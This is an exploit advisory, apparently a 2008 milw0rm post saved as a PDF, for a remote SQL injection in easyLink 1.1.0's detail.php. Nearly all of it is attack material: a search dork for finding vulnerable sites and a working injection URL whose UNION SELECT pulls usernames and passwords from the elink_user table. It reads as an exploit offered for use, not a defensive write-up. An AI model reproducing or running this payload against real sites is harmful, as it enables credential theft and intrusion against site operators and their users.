easyLink 1.1.0 detail.php Remote SQL Injection Vulnerability.pdf

1 ================================================================================ 2 easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability 3 ================================================================================ 4 5 6 7 Discovered By: Egypt Coder 8 9 home : WWW.Sec−Area.com 10 11 Mail: Egyptcoder@hotmail.com 12 13 14 15 Dork: Engine powered by easyLink V1.1.0. 16 17 18 19 Exploit : 20 21 22 http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user 23 24 25 Greets rUnViruS, Error Code, H666p , Fear Master , ProViDoR 26 27 # milw0rm.com [2008−09−19] Page 1/1 easyLink 1.1.0 detail.php Remote SQL Injection Vulnerability Egypt Coder 09/19/2008